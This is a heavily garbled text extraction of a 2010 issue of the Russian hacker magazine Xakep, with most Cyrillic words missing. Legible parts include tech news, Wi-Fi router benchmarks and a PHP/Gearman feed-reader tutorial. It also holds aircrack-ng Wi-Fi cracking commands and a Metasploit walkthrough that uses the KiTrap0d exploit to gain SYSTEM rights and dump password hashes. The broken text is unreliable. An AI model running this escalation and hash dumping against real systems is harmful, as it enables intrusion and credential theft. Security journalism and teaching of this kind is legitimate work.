Хакер 2010 03 PDF

.
54
x 03 () 2010
.
210
:

TDL3:
03 (134) 2010
USERLEVEL!
IE: 0-DAY
NT AUTHORITY \SYSTEM

WINDOWS
7
KDE

KDE 4
. 32
. 94
. 48
134
. 28

ASTERISK
. 119
INTRO
, . - IE
. , ,
(- ) Google. ,
.
, , ,
IE. -
IE. 144 .
!
nikitozz, . .
nikitoz@real.xakep.ru
z
Content
MegaNews
004
Ferrum
016

802.11n
PC_ZONE
020
, GOOGLE READER!
026
MAEMO 5 TIPS'N'TRICKS
028
032
USERLEVEL!
084
088
094
KDE
036
EASY-HACK
042
048
054
TDL3
058
GOV
060
VEH WINDOWS X64

Internet Explorer
064
068
SQL
072
X-TOOLS
2.
SQL
104
108
][-
110
074
079
][-
, BitTorrent
-
Windows
-
.NET
C++
SYN/ACK
114
119
126
132
IN DA FOCUS
,

Asterisk

Windows

134
7 KDE 4
098

NT AUTHORITY\SYSTEM Windows
Gujin,
netboot.me boot.kernel.org
PSYCHO:

138
FAQ UNITED
141
144
WWW2
FAQ
8.5
web-
028
094
072
048
/
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
>

(lyashchenko@gameland.ru)
> xakep.ru
(xa@real.xakep.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

/PUBLISHING
>

119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.ru)
>

>

>
(strekneva@gameland.ru)
>

> -

>

(andrey@gameland.ru)
>

(devald@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.

.
.

:
content@gameland.ru

.
, , 2009
MEGANEWS
MIFRILL MIFRILL@REAL.XAKEP.RU
MEGANEWS

,
SUN!
,
Oracle Sun Microsystems, .
, ,
, ,
. ,
Sun

Java, hardware-,
, ,
VirtualBox, Solaris , MySQL - .
, 9 , , ,
, ,
$7.4
! ,
Oracle ,
. .
Oracle

Kenai (www.kenai.com).
Sun 2008 ,
Java, , , . , ,
Java, Oracle,
. http://
sun.com , , ,
oracle.com.
Sun Microsystems,
IT.
004
LG
LG DVD- GH24 Super Multi.
24
,

Silent Play. Silent Play
,
.
GH24 2.400
, 32
;
, 30
.
, GH24
,
.
Jamless Play,

,
.

.
SecurDisc,

, LG iODD
,

-.
GH24 Super Multi
1100 .
WD
,
VelociRaptor Western
Digital. , , ; SATA
6 /, 10.000 /, 64 .
, 300 ;
, 600
. , HDD $300.
393 -
2009
BREIN.
X 03 /134/ 10
MEGANEWS
PC27
GOOGLE

90%
-
IPV4.
Google ,
, ,
, ,
. , ,
, , , IE6,
Google
(Yahoo, Symantec, Adobe ..). Google
(googleblog.blogspot.com) .

,
.
?
, , 4 , ,
Google.cn, , Baidu.com ? :) ,

.
, Microsoft
,

. ,
. Microsoft, ,
, ,
,
IE , , ,
, , .
IE . ,

Opera Software Mozilla. ,
Google

. , Opera ,
40% 4 .
QWERTY
Twitter
.
, , ,
Twitter,
370 ,

Twitter . blacklist naked,
stupid, twitter, secret, porsche,
ferrari russia.

123456 password
,
- -
. , gfhjkm (
) - .

,
. Twitter
, ,
malware-.

,
,
.
LENOVO
, - ? Lenovo IdeaPad U1 Hybrid,
- . ,
. - Qualcomm
Snapdragon, - 16 , 512 ,
11.6" (1366 768 ) .
- Intel Core 2 Duo U4100 1.3 , 4
DDR3 128 .
Skylight Linux, - Windows 7. Bluetooth,
3G WiFi ,
- 1.3 .
8 .
, $999.
006
X 03 /134/ 10
MEGANEWS
J3
PC27
, ;
13% ( AKAMAI).

aka Script, , carderplanet.
cc,

,
-
, .
Script

( -
),
,

.
,

: , ,

kraina.org.
ua,
.

,
,
.
, - , .

:
15.000 ,

, ,
.
kraina.org.ua
PR ,
400-500 ,
.
LINUX FOUNDATION, 5
LINUX- 80%.

Nexus One Google,
,
, , .
HTC,
T-Mobile G1 Nexus One . ,
: 3.7" (AMOLED, 480 x
800), , , ; Qualcomm Snapdragon
3G QSD8250 1 ; 512 , 512 ; SD 4 ( 32
); , 1400
. Android 2.1, GSM/
EDGE (850, 900, 1800, 1900 ), Wi-Fi (802.11b/g/n), Bluetooth
2.1 , 5 . ,
AGPS- .
Nexus One
$529.99. , ,
, , :).
, ?
Android, Cyanogen,
Nexus One
(http://forum.xda-developers.com/showthread.php?t=621441),
, .
(iptables,
USB, WLAN), SSH (
Dropbear) Nano, htop, powertop busybox.
008
2

PANDALABS.
X 03 /134/ 10
009
MEGANEWS

,
. , , Google,
Bing, Yahoo, MSN, . ,
, ,
, , ,
. , ,
,
, ,
. , 10-20 . .
- , , .
,
.
$1337 GOOGLE,
CHROME .
MYSQL!
Sun Oracle , , , MySQL.
, ,
, Sun 2008 ,
MySQL . - , 2009
Sun, , , 2009,
Sun Oracle. , Oracle
, MySQL, ,
. helpmysql.org, 30
. MySQL, .
, , ,
, , ,
. , MySQL
. . Oracle
Wall Street Journal,
SPAR Solaris , Sun, MySQL
.

- Microsoft
, ,
.
2007 , $240
. Facebook,

, , ,
. -
, ,
Facebook
2008. , ,
010

Facebook, Twitter (twitter.com/BillGates). ,
, Hello World.
380
. .
, 10 . ,
Microsoft
17 ?
X 03 /134/ 10
11
MEGANEWS

, , ,
, -, -,
SMS ,
,
. , ICQ . Piggy.zip H1N1
-,
.
\? : , ,
:), ? !. , . H1N1 , ,
ICQ , .
Piggy.exe, 1,95 ( !).
Delphi,
PEiD. , ,
,
.
OllyDbg 004A60AC. ,
:). , ,
5 (4 + -).
4-
,
. ,
. ,

. , : 000110001101010000110001
: 0001 1 0001 1 0101 0 0001 1 0001
4-
(0001b => 1, 0001b => 1, 0101b => 5), ,
(115d = 73h = s).
, . icq.com/people/__, HTTP- http://uasc.org.ua/Piggy.
php?=< > .
decoder.php , ,
, eLwaux (uasc.org.ua). , ,
. 2005
IM.Myspace04.AIM,
, (lol no its not its a virus,
). 2007 , .
aka segvec aka

soupnazi aka j4guar17,

, . , 2008 ,
19 ,
, .
,
15 25
,

. , ,

170 .

,
130 .
,

,
, LSD, ,
,

. ,
,
,

. ,
,

:).

22

. ,
Twitter IP-,
, . ,
, ,
. -
, , . , ,
, ,
, .
012
X 03 /134/ 10

ErgoMotion Smartfish
Technologies , . . .

, ,
,
. 7 ,
.
,
,
. USB.
, $150,
$50.
8199,5
INTEL CELERON 347 (3,06 ) TIN.

, , ,

,
.
Intel Netgear, CES 2010
Intel Wireless Display,
720p Wi-Fi. Intel WiDi ,
( Sony, Dell
Toshiba, Intel Core i3, i5
i7),
, .
,
802.11n,
,
. ,
HDCP (
), Full-HD,
,
,
WiDi.
.
AMAZON: 25 2009

.
X 03 /134/ 10
013
13
MEGANEWS
NETCRAFT , 1
2009 233.848.493 .
PS3
GeoHot,
jailbreak ,
Playstation 3,
.
PS3, , ,
.
, 3 , 2
11 ,
, . , PS3, , Xbox360,
,
. Xbox, PS3
Linux, ,
, ,
Linux . ?
,
/
ring0, .
Sony,
.
,
ROM Mark.

,
.

. ,
. ,

-,
PS2. PS3 Linux
.
, IPAD
,

Apple , iPad, , .
, Apple :
LED- 9.7" 1024 768 , , Multi-Touch; Apple A4
1 ; 16 64 -.
iPhone OS 3.2, , ,
iPhone iPod touch,
.
Apple, ,
WiFi Bluetooth,
3G-. iPad,
, 10
.
,
GPS, ,
,

.
- iBookstore,
. , iPad
: , , - ,
Skype ;
Flash, -,
, ; USB-;
, , , . () 242.8 189.7 13.4,
680 733 , .
iPad Wi-Fi
$500 $700, , iPad
Wi-Fi+3G $600 $800.
:
44-
.
014
X 03 /134/ 10
?
Google,
Microsoft , ,
,
.
Google Energy

, , ,
Google ,
.
, , , , ,

,

. , ,
,
Google ,
,
,
Google
.

MICROSOFT
, -,
Microsoft - ,
. Microsoft
,
Office 2003 2007,

. -
-? -
, ,
i4i.

Word, Microsoft
Word 2003
Custom XML, i4i .
2007 ,
Microsoft
$290 .,

Office, . Microsoft, , ,
,

Office
2010, .
Word 2007 Office 2007 Custom XML
.
X 03 /134/ 10
015
FERRUM

:
TRENDnet
TEW-652BRP
D-Link
DIR-85
NETGEAR
WNR-2000
D-Link
DIR-655
NETGEAR
WNR-3700
NETGEAR
WNR-3700
D-Link
DIR-655
ASUS
RT-N16
AMD Athlon
II X4 620
ASUS
RT-N16
802.11N
!,
WI-FI. ,
. ,
IEEE 802.11N, ( )
600 /!
2.4 5 . ,
. ,
.
:
.
1) ,
LAN, WAN. ,
( NAT). ( ),
. IP-.
2) PPTP- WAN-. , .
, ,
.
3) . ,
Wi-Fi. 1 6 ( ). Wi-Fi , . WPA2-PSK
AES.
016
ASUS RT-N16
D-LINK DIR-655
D-LINK DIR-855
NETGEAR WNR-2000
NETGEAR WNDR-3700
TRENDNET TEW-652BRP
PPTP, /C
Asus RT-N16
24.12
31.04
34.54
99.3
D-Link DIR-655
67.98
129.73
152.69
D-Link DIR-855
118.38
72.45
NETGEAR WNR-2000
78.8
TRENDnet TEW-652BRP
FDX
81.51
110.42
NETGEAR WNDR-3700
lanwan
113.2
161.68
176.02
51.72
50.34
55.01
wan-lan
D-LINK
PPTP-
X 03 /134/ 10
Link
-855
4700 .
ASUS
RT-N16
5200 .
: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)

10/100/1000 /
WI-FI: IEEE 802.11 B/G + IEEE
802.11N ( 300 /)
, : 2,4~2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP, AES)
: NAT/NAPT, DYNDNS, STATIC ROUTING, DHCP,
EZQOS
: SPI, PACKET FILTER, URL FILTER, MAC FILTER
: PPPOE, PPTP, L2TP,
IP-
: EZSETUP, WPS, - UPNP, WAN
BRIDGING, AIDISK, 2 USB 2.0
ASUS RT-N16 . ,
USB-
, .
(
HTTP, FTP BitTorrent) . Broadcom BCM4718,
533 , 128 DDR2.
, ; WPS ( ) EzQoS ( ).
WAN
IPTV CPU-. .
, NAT 145
/. PPTP .
X 03 /134/ 10
D-LINK
DIR-655
:
: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)

10/100/1000 /
802.11N ( 300 /)
, : 2.4~2.5
(TKIP/AES), WPS
: NAT/NAPT, DYNDNS, DHCP, STATIC ROUTING,
IGMP MULTICAST , QOS
: SPI, URL FILTER, MAC FILTER, IP FILTER,
ACCESS CONTROL
IP-
: WPS, USB-
,
3G,
. ,
, IGMP Multicast, QoS,
,

WPS. ,
,
.
PPTP, PPPoE L2TP. , , .
,
USB-,
.
017
FERRUM
WI-FI, 1 , /C
Asus RT-N16
40.89
50.26
32.76
D-Link DIR-655
59.64
72.33
68.32
91.37
100.8
D-Link DIR-855
85.92
46.18
NETGEAR WNR-2000
29.15
NETGEAR WNDR-3700
both
77.23
27.6
TRENDnet TEW-652BRP
Upstream
65.78
48.02
36.61
63.08
63.48
downstream
D-LINK DIR-855
, , 5
8200 .
D-LINK
DIR-855
NETGEAR
WNR-2000
2200 .
: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)

10/100/1000 /
802.11N ( 300 /)
, : 2,4~2,5, 5
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP, QOS
: SPI, URL FILTER, MAC FILTER, IP FILTER, DMZ
IP-
: WPS, USB-, -
: 1XWAN (RJ-45) 10/100 /, 4XLAN (RJ-45) 10/100

/
802.11N ( 300 /)
, : 2,4~2,5
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP, UPNP,
QOS
: SPI, URL FILTER, MAC FILTER, KEYWORD
BLOCKING
: PPPOE, PPTP, IP-, BIGPOND
: WPS,
-
,
. 5
, , ,
5 2.4 . . ,
LAN-WAN , , , Ethernet. USB,
, HDD , ,
D-Link DIR-655, .

WAN,
, . ,
.
, , ,
.
,
. ,
NETGEAR WNR-2000
.
,
, .

, -, ,
L2TP .
018
X 03 /134/ 10
WI-FI, 6 , /C
Asus RT-N16
23.72
32.76
31.53
D-Link DIR-655
33.84
65.26
43.9
D-Link DIR-855
72.19
38
NETGEAR WNR-2000
23.32
29.66
NETGEAR WNDR-3700
17.2
TRENDnet TEW-652BRP
Upstream
both
34.54
91.92
94.33
51.42
57.72
51.08
55.4
downstream
NETGEAR
WNR-3700
5200 .
TRENDNET
TEW-652BRP
: 1XWAN (RJ-45) 10/100/1000 /, 4XLAN (RJ-45)

10/100/1000 /
802.11N ( 300 /)
, : 2,4~2,5, 5
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP, UPNP, QOS
: SPI, URL FILTER, MAC FILTER, KEYWORD
BLOCKING
: PPPOE, PPTP, IP-, BIGPOND
: WPS,
NETGEAR WNR-2000 ( Wi-Fi),

. , USB
, DLNA, (2.4
5 ). ,
SMB, Wi-Fi,
,
. , , NAT
PPTP- !
NETGEAR : L2TP, web-.
,
, . -
X 03 /134/ 10
2000 .
: 1XWAN (RJ-45) 10/100 /, 4XLAN (RJ-45) 10/100

/
802.11N ( 300 /)
, : 2,4~2,5
(TKIP, AES)
: NAT, DYNDNS, STATIC ROUTING, DHCP
: SPI, URL FILTER, MAC FILTER, IP FILTER
IP-, BIGPOND
: WPS
,
, Russia PPTP Russia PPPoE. ,
. ,
. ,
, , .
:
VPN , IP-, IP, MAC
URL, Wi-Fi
Protected Setup.
, .
, .
, - ,
- ,
. ,
D-Link DIR-655,
,
.
TRENDnet TEW-652BRP,
.z
019
PC_ZONE
alex.raiden@gmail.com
,
GOOGLE READER!

, - .
, , ,
. . ,
!
Google Reader.
,
-
,
PHP MySQL.
RSS-

. ,
,
Key-Value-,

, ,
.
PHP!
,
.

RSS- , XML.
: RSS
(,
020
Mozilla Thunderbird), ,
- .
-,
, Google Reader.
:
, reader.
google.com .
, . , ,
.
(
, Google Reader ).
Twitter-, .
,
,
, . , ,
- ,
, , Google
,
, . ,
: -
, .

PHP-,
. ,
,
Amazon EC2 ?

. ,

, .

LAMP-,

Zend Framework jQuery, MySQL
.
Gearman. ,

:). .
X 03 /134/ 10
YOUR CLIENT APPLICATION CODE
GEARMAN
STACK
GEARMAN CLIENT API

(C, PHP, Perl, MySQL UDF, ...)
YOUR
GEARMAN JOB SERVER
PROVIDED
APPLICATION
gearmand
BY GEARMAN
GEARMAN WORKER API

(C, PHP, Perl, ...)
YOUR WORKER APPLICATION CODE
- GEARMAN

, .
, ,
, ,
URL , , , RSS ,
. URL
. !
?
,
.
, http:// ,
.
, ,
.
.
Zend Framework, , Zend_Uri, . ,
;
, - ?
, ,
( validURI.php),
, .
, X 03 /134/ 10
(,
),
Zend_Uri::factory .
- , .
: ,
http://
URL . ,
, ,
URL, , URL
.
,
. ,
-,
. ,
. Zend' Zend_Feed_Reader,
(
XSLT
CNBC).
,
RSS- , -
! Zend_Feed_Reader

, . ,
.
.
, ,

?
HTTP .
,
( HTTP-),
.
Zend
!
,

Zend_Feed_Reader:
$cache = Zend_
Cache::factory('Core', 'File',
array('lifetime' => 24 * 3600,
'automatic_serialization' => true,
'cache_id_prefix' => 'xakep_'
), array('read_control_type' =>
'adler32','cache_dir' => /tmp/
xakep/cache));
021
PC_ZONE

?
- PHP 5.2.11 , 5.3.1.
- -, Apache 2.2 Nginx.
- , MySQL , 5.1.
- Gearmand .
- Memcachedb, Gearmand
.
- Redis ,
Redis 1.2,
GitHub-.
- Zend Framework (
trunk- SVN-).
,
jQuery jQuery UI .
phpMyAdmin.
//
Zend_Feed_Reader::
setCache($cache);
// HTTP
Zend_Feed_Reader::useHttpCondition
alGet(true);

,
,

Memcached.
- .
MySql feeds user_
subscriptions .
?
;
, . feeds
, .
db.sql
.

, .
.
(, cron-) ,
, . ,
. -
022
, (
);

( ,

). : ,
?
.

.
MySQL
, , .
, , ,
, .
,

.
, SQL- - key/value (#128 z, PDF-
). ,
NoSQL- Redis.
,

, ,
.
Redis-
Rediska. , , Zend
Framework -,
, . :
$redis_conf =
Array( 'namespace'=>'xakep_',
'servers'=> array(array(
'host'=>'localhost',
'port' => 6379, 'weight'
=> 1)),
'keyDistributor' => 'crc32');));
try
{
$redis = new Rediska($redis_
conf);
}
catch (Rediska_Exception $e)
{
die("[ERROR] Error creating Redis
instance: " . $e->getMessage());
}
Redis- .
.
SET,
,
. ,
, ,
MD5 , .
,

.
!
processFeed (
processFeed.php) ,
, ,
. , ,
X 03 /134/ 10

GEARMAND
:
$_item['hash'] = md5($_
item['title'] . '|' . $_
item['link'] . '|' . $_
item['time']);
,
:
$_fhash = md5($feed_url); //

if ((!$redis->exists($_fhash))
|| (($redis->exists($_fhash)) &&
(!$redis->existsInSet($_fhash,
$_item['hash'])))
{
// , ! !
$redis->addToSet(md5($feed_url),
$_item['hash']);
}
else
continue;
,
, .
>getDateCreated()->getTimestamp();
$_item['link'] = $feed->getLink();
,
. ID , ,
,

md5-. , -
$feed = Zend_Feed_
Reader::import($feed_url);
if ($feed instanceOf
Zend_Feed_Reader_FeedAbstract)
{ /*
*/ }
, .
. ,
, ,
. , ,
,
, , , !
foreach
.

md5-
, . ,
Redis-. , ,
, .
.

,
, :
$_item['title'] =
htmlspecialchars($feed->getTitle(),
ENT_QUOTES);
$_item['time'] = $feedX 03 /134/ 10
023
PC_ZONE
, , , ,
, , . Zend :
$dbbeginTransaction() $dbcommit(). , , Rollback: $dbrollBack().
, (
), , ,
.
- ,
!
,
GEARMAN'
, ,
. ,
. , .
, -
, , .
.
, , Java,
Python. ,
.

, . ,
(, ),
,
. , ,
.
: Cron 5 ( , ) , , , Gearman'
. 10 , ,
, , . ,
,
.
, ,
, ,
, . , , .
,
,
. ,
,
,
JAVA,
PYTHON. ,
, .
, . , PHP! :)
Gearman. ,
, .
, , , ,
.
, ,
Gearman ,
. ! ,
Gearman , ,
, cron .
, API ,
MySQL UDF ( ).
C-,
,
PEAR- Net_Gearman, ,
. ,
, PECL.
apt-get install gearman-jobserver, gearmand d. 4730,
.
, ,
, . , . Gearman-, JSON-
024
, , ! ,
, , ,
, ,
. - , .
. , .
( feedWorker.php)
GearmanWorker, . (
) addServer(). , ,
,
addFunction. , , , Gearman
.
, ,
.
$worker = new GearmanWorker();
$worker->addServer();
$worker->addFunction("feedProcesor",
"myFeedProcessor");
function myFeedProcessor($job)
X 03 /134/ 10
GEARMAN
Gearman,
.
:
- (, job) ,
.
,
. , , ,
. , ,
. , JSON.
- ( ,
Job API), .
, , ,
-.
- (Task) , .
, ,
.
- ,
.
- , . ,

.
,
. ,
,
. ,
, Gearman MySQL
memcachedb ,
. , ,
.
$gmclient= new GearmanClient();

$gmclient->addServer();
$feed_links = $db->fetchAll('SELECT fid,
feed_url FROM feeds WHERE errors < 3');
foreach ($feed_links as $fl)
{
echo "Add to processing queue: " .
$fl['feed_url'] . "\n";
$gmclient>addTaskBackground('feedProcesor', Zend_
Json::encode(array($fl)));
}
$gmclient->runTasks();
, . , , Gearman API,

.
, 3- .
, , - ,
.
, JSON-. ,
,
runTasks().
. ,
.
, do(), ,
.
, ,
,
, .
Cron-,
, , . , ,
10 , .
: ,
, , .
,
, .
,
.
while ($worker->work());
, ?
{
$feeds =
Zend_Json::decode( $job-> workload() );
,
, .
JSON-,
Zend_Json, .

!
processFeed.php
processFeed()
$feeds.
Gearmand,
, $job>sendComplete('OK').
true: ,
. , , . :
X 03 /134/ 10
, ,
, , ,
,
.
, , Gearman.
,
. , Digg.com Yahoo!
Gearman.
Zend Framework , , RSS-
! , ,
, ,
,
. ,
, Google Reader,
. z
INFO
info
Gearman PHP
Extension:
pecl.php.net/package/
gearman.

Gearman:
pear.php.net/package/
Net_Gearman.
Python:
launchpad.net/
gearman-interface;
samuel.github.com/
python-gearman.
Java
:
launchpad.net/
gearman-java.
RSS (Really Simple
Syndication)

XML-

.
RSS,

, ,
Atom
RDF. Atom

http://tools.ietf.org/
html/rfc4287)
Google.
DVD
dvd

,

.
025
PC_ZONE
CODING
STEP

STEP@GLC.RU
ALEKSANDR-EHKKERT@RAMBLER.RU
MAEMO 5
TIPS'N'TRICKS
LINUX-, MAEMO
. ,
,
. , ,
,
.
1:

, N900, . ,

- , ,
.
,

.
,

AppWatch. Qt,

,
, ,
. ,

.deb- ( Bluetooth-,
).
. Nokia N900
,
,
deb- .documents
. ,
, :: dpkg
-i /home/user/MyDocs/.documents/
[ ].deb
026
MyMenu
Catorise,
, .
2:

,

X-Toolz. , nmap
aircrack
Maemo, Maemo5
.
, ,
!
Nmap N900

!
, Maemo GUI-,

: , nmap -v -O
PN 192.168.1.1. ,
Wi-Fi,
,

, ,
MAC-. ,
Wi-Fi WEP/WAP-,
aircrack'.
, WPA
/, -
,
.
,
WPA Handshake.

(
CUDA),
PS3
. ,
aircrack-ng
, , ,
ESSID
: aircrack-ng -c 11
-e victim -Z 4 -W 1 -F cap wlan0.
cap-,
. ,
, , N900
50 :).
extras-devel,
.
3:
,
N900 Quake 3, .
Maemo5

: Doom 2, Warcraft 2, Starcraft, Quake,
RedAlert, Duke Nukem 3D. , X 03 /134/ 10
BLUEMAEMO N900

Linux': , Quake 3 OpenArena, Warcraft 2 WarGus,
Doom PrBoom ..
Simple DirectMedia Layer (SDL),
,
Maemo,
. , SDL
,
,
.
,
, , Linux', ,
SDL.
,
.
.

DOSBox,
N900.
DOS,
, MS-DOS.
,
Fallout ( DOSBox'
: migenonline.com/
N900/dosbox-0.73-Fallout1.conf.txt), ,

.
4:

N900 , AJAX, Gmail.
,
MicroB Mozilla Gecko,
Firefox
. Fennec, 6-
-, - :
. ,
X 03 /134/ 10
NMAP N900
, , ,
. Fennec
2,
. . ,
,
about:config, browser.cache.disk.
enable .

, .
,
, ,
Ctrl-Shift+O,
. N900

,
.
5:

, ,
. ,
N900
BlueMaemo.
? Maemo
, Blueooth.
, Bluetooth
HID Bluetooth,
.
BlueMaemo Wait
a connection ( ).
, , Bluetooth-,

.
Bluetooth- : .

-
. :
N900
, . ,
,
( ),
-.
,
BlueMaemo PlayStation 3,

Bluetooth-. Linux-, HID-
hcitool
scan, ,
hidd connect _bt___
hid, .
6: N900
N900, ,
,
. ,
Linux',
,
,
, ,
. ,

, RDA (Remote
Device Access) apu.
ndhub.net.
/,
www.forum.nokia.com.

( Firefox, IE, Opera Safari
Google Chrome ),
JRE. ,
( , Nokia X6)
.jnlp-, Java.
, !

Maemo (www.xakep.ru/N900). z
027
PC_ZONE
Step twitter.com/stepah
! ,
, ,
, . ,
,

?
? ,
,
? :).

.

-

, . ,
- ,
.

.
VIRUSTOTAL
WWW.VIRUSTOTAL.COM

- ,
VirusTotal. :

40 ,
028
.
,
,
,
:).
, - VirusTotal
Uploader.
,
. ,

, .
,
, ,
,
. ,
SANDBOXIE
WWW.SANDBOXIE.COM
, : , ,
, ,
. ,
,
. , , ,
,
(sandbox).
, ,
,
,

X 03 /134/ 10
CWSANDBOX'

,
. Vista
: sandbox
,
UAC.
, ,

, Sandboxie.

,
, sandbox'.
, ,
sandbox, - ? .
,
.
Sysinternals (technet.microsoft.
com/ru-ru/sysinternals) , ,
Process Monitor,
,
, , DLL.
Autoruns
,
- .
API, .
API Monitor
(www.apimonitor.com)
SysAnalyzer (labs.idefense.com). , ,
,
.
, , , :
X 03 /134/ 10
,
,
.
,
. ,

, , ,
host ,

, Threat Expert
. ,

,

. ,
: GUI-,
. ?
,
.
:
CWSAndbox , , VirusTotal
(,
). -
,

.
ANUBIS
ANUBIS.ISECLAB.ORG
,
CWSAndbox.
,
,
. ,
,
,
!

CWSAndbox
, . ,
CWSAndbox :
- , , . . , ,
, ,

.
...
, , , Threat Expert ,
,
. , , ,
, ?
-
.
,
, Anubis.
pcap-
,

Wireshark',
,
Network Miner (networkminer.sourceforge.net),
.
, Anubis
.
HTTP, .
,
:
,
.

.
THREAT EXPERT
WWW.THREATEXPERT.COM
COMODO INSTANT MALWARE ANALYSIS

CAMAS.COMODO.COM
CWSANDBOX
WWW.CWSANDBOX.ORG
Threat Expert,
- Comodo : -
029
PC_ZONE
PDFID
BLOG.DIDIERSTEVENS.COM/
PROGRAMS/PDF-TOOLS
ANUBIS PCAP-
, . ,
CWSandbox Threat Expert
.
, ,
,
, -
.
Comodo ,

. ,
:
,
DNS/
HTTP-, API-, DLL- ..
,
, , .
MANDIANT RED CURTAIN

WWW.MANDIANT.COM
Mandiant
Red Curtain, . PE-
:
, ,
.
, ,
, ,
.
,
,
.. ( -).
, Mandiant Red Curtain, ,
,
.
PEID
PEID.HAS.IT
,
,
/.
, -,
, , -, -
030

. , , PEiD.

600 PE-,
/,
.
, Python nPEid
(http://www.malforge.com/npeid/npeid.
zip). pcap-
PE-,
. , PEiD
:
.
OSAM
WWW.ONLINE-SOLUTIONS.RU/
PRODUCTS/OSAM-AUTORUNMANAGER.HTML
,
- ,

. Online Solutions Autorun Manager,
.

. OSAM . ,
,
.
API (RegQueryValue, RegOpenKey ..),
.
, OSAM

. ,
Online :
, ,
,
.
.
,

.
,

. PDF-
, Adobe Reader.
Internet Explorer , Adobe Reader
,
.
, ,
JavaScript,
PDF-
. ,
PDF JavaScript, ,
, ,
?
PDF-
, ,
. PDF
,
JavaScript'. ,
/JS /JavaScript ,
JS-. /AA /OpenAction
, ,
.
PDF
JS-
PDF-
JS
X 03 /134/ 10
HTTP://WWW
links
:
tinyurl.com/reversemalware-sheet.
INFO
info

,
Returnil
Virtual System (www.
returnilvirtualsystem.
com).
,
.
PDFiD,
PDF Tools Python'. ,
JS,
pdf-parser.
JS-
.
Malware URL.

(VirusTotal, Wepawet, Anubis, Threat
Expert), .
: ,
.
,
RSS. , ,
:).
WEPAWET
WEPAWET.ISECLAB.ORG
- PE-. Wepawet
PDF, HTML Flash
.
Wepawet ,
,
.
, Wepawet
,
,
. Wepawet
JS-,
HTML,
. SWF ,
-!
MALWARE URL
WWW.MALWAREURL.COM
, , Wepawet X 03 /134/ 10
, !
, .
, .

,
.
- . z

Windows

,
: Program
Files, Windows, Users\
%AllUsersProfile%\
ProgramData, Documents and Settings
HKLM\
Software.

,
.
Norman Sandbox
(www.norman.com/
security_center/
security_tools/submit_
file/en)

DVD
dvd

,
,
DVD.
031
PC_ZONE
NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM
GETSYSTEM
GETSYSTEM
USERLEVEL!

NT AUTHORITY\SYSTEM
WINDOWS
METASPLOIT
,
. GETSYSTEM, USER LEVEL RING0,
NT AUTHORITY\SYSTEM! .
19
0-day ,
Windows,
NT 3.1,
1993 , . exploit-db.com Tavis Ormandy

KiTrap0d, ,
. .
vdmexploit.dll
vdmallowed.exe, -
-, exe-.
, , ,

, NT AUTHORITY\SYSTEM.
,
.
cmd.exe
. ?
,

.
Internet Explorer
, -
032
. ,
( ), ? -
KiTrap0d,
NT AUTHORITY\SYSTEM!
, ,
,
, ,
(
). NT !
,
Microsoft, , .

, 25
Metasploit , KiTrap0d
.

, , .
,
Metasploit
update. ,
, run kitrap0d
.
, -
, Metasploit.

,
meterpreter, :).
,
( )
. ,
:
meterpreter > getuid
Server username: WINXPSP3\user
, . ,
,
. ,
getsystem, , ,
:
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege
to that of local system.
OPTIONS:
X 03 /134/ 10
KITRAP0D
, MICROSOFT

FIXIT!

-h Help Banner.
-t The technique to use. (Default
to '0').
0 : All techniques available
1 : Service Named Pipe
Impersonation (In Memory/Admin)
2 : Service Named Pipe
Impersonation (Dropper/Admin)
3 : Service Token Duplication
(In Memory/Admin)
4 : Exploit KiTrap0D (In Memory/
User)
, KiTrap0D
. ,
,
NT AUTHORITY\SYSTEM (
-t). ,
, ,
. KiTrap0D,
,
.
meterpreter > getsystem
...got system (via technique 4).
, , KiTrap0D ,
.
? UID ( ):
X 03 /134/ 10

Server username: NT AUTHORITY\
SYSTEM
! NT AUTHORITY\SYSTEM
. , ,
. ,
Microsoft
.

, . Metasploit
hashdump

pwdump. ,
, LANMAN/
NTLM
. . ,
hashdump
NT AUTHORITY\SYSTEM.

[-] priv_passwd_get_sam_hashes:
Operation failed: 87. ,
LANMAN/NTLM- HKEY_LOCAL_MACHINE\SAM HKEY_
LOCAL_MACHINE\SECURITY, .
. ,

hashdump ,
,
. , ?
Server username: NT AUTHORITY\
SYSTEM
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key
using SYSKEY 3ed7[...]
[*] Obtaining the user list and
keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:aad2bbbe2b51404e
eaad3b435b514ee:...
Guest:501:aad3b435baaaaeaa3b435d3b
435b514aae04ee:...
HelpAssistant:1000:cefa2909bd5b0f4
602168042f2f646:...
. , , l0phtcrack
(www.l0phtcrack.com).
033
PC_ZONE

, .

MSDOS WOWEXEC ,
,
.. NtVdmControl() NTVDM. Windows
,
HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Control\WOW
- .
16- .
GPEDIT.MSC,
/ /
Windows/

16- .

NT AUTHORITY\SYSTEM
16-
HTTP://WWW
links

:
archives.
neohapsis.com/
archives/fulldisclosure/
2010-01/0346.html.

Microsoft: support.
microsoft.com/
kb/979682.
WARNING
info
.

.
034
,
